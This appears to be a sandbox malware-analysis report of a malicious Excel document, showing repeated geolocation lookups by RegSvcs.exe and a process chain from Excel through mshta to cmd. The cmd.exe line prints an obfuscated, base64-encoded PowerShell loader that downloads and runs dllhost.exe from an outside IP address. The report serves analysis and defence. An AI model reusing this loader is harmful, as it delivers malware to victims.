                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:01 UTC675INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:01 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 12
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyKVZZg5PTBRJw2t7uXPmK%2FKuTuI57%2BHYjzEPv5BKblAUV4JDkzUekfgAwXlEeKad7Hm%2B7eV%2FI0H5qp8BXHJGXkVYrDBgFZUdML5FnWFoq3zatisUimHocvhI7AGpCDTzthhOQ40"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c05428320f6b-EWR
                                                                                  2024-09-30 08:13:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.2249190188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:02 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:13:02 UTC673INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:02 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 13
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hiyoYcVNmb7rXPOEBRuRTEPxueUR6%2FwFNsYaIcE3VuH0oG%2FsyhoBpLyMsNGfxP5anE7K7yt4Yf17xpLwpywsnhCSxwB98wGfsVx5sIDfOGHhp7FpGDZtRcn%2Bp7O7emVP5VcxZC1r"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c059db1b78e1-EWR
                                                                                  2024-09-30 08:13:02 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.2249192188.114.97.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:03 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:03 UTC681INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:03 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 14
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hpFFMFyQyhdQpGfG%2BCXm6BN7yVXFGKEI5lwGcJ4HlFC%2Bvkfjb%2BeEtit7OZLlZg4hJD6X1dNHDwTg%2F8vme4teKbixF6yPpSs4%2FnIehIePSGaW5TyQVUADUbeHMno%2B%2BVMgv2VQMwiB"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0639df97c7b-EWR
                                                                                  2024-09-30 08:13:03 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.2249194188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:05 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:05 UTC679INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:05 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 16
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULjF4Q4YDBB7Vi9wFiRXv%2BHMwvhyalHaJOVxj3qe9HrhDLZkD19sYvx6x5CDg94J%2B31yyqIkX%2Fm1ZKuirigly%2FRq%2BNAIe5pJ%2FRKQFRZ39Ah7EDY0CMJuxbIhqFpCrQ0fenzfNQ3a"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c06ecc488cc6-EWR
                                                                                  2024-09-30 08:13:05 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.2249196188.114.97.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:07 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:13:07 UTC675INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:07 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 18
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PcqSpDJLn7Ey3V6fI%2B%2F2KP0JIXxRvC6mvE7%2BX3kAg9g69Pl2PC%2Bz0ovyn8WjiNVbaaWzRsENBDZIb0TuYzoz2a904CzbzTBqH6LfuBLG9TgSUELSXkXeBGDHlH0rZtzlPF41Owz6"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0776b95439c-EWR
                                                                                  2024-09-30 08:13:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.2249198188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:08 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:08 UTC673INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:08 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 19
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOClo4XR1fuOnErL0eBierT%2B8Q353h%2FJbtXFXiKJlgTiafJklZrz1gcHK3OZC1fHHtaNYI70QYnfV2XiLrtIeYjs2Hz21wsNOgqg1IUNWFE%2B5zcVHjf9mC3xNAXJUGuE4HlGTBvA"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c07f89174376-EWR
                                                                                  2024-09-30 08:13:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.2249200188.114.97.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:09 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:13:09 UTC675INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:09 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 20
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=psZXysUQbBOZfaAfsiXpP7Az4N99rwVtVO%2BgJQHywa3TF7Et%2F3r9OHjdodIxbJyLJDMj7JZHkaJxRJx4tgXayTRrzmufo6Xa%2Ba7RmEv0FFwcuYmP9%2Fh3Jmc04R4vSvPW3lGvLOCw"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0880bd11a07-EWR
                                                                                  2024-09-30 08:13:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.2249202188.114.96.34433176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-30 08:13:11 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:11 UTC671INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:11 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 22
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uS1x1Yi8q626ocZZCaSyaOKMi4FcQAw33fhbS6a4TL3VEqq2SOqUi6rwhXLBKtV3jdnLGApFeDzHQW9rV4PE29Zk%2BV7KveM7vlNbRhcckapLhavknZVLfdO4NVWFre8qHN%2FxKxl5"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0953f8b4310-EWR
                                                                                  2024-09-30 08:13:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:04:11:55
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                  Imagebase:0x13f8e0000
                                                                                  File size:28'253'536 bytes
                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:04:12:18
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                  Imagebase:0x13f730000
                                                                                  File size:13'824 bytes
                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:04:12:22
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
                                                                                  Imagebase:0x49f50000
                                                                                  File size:345'088 bytes
                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:04:12:22
                                                                                  Start date:30/09/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
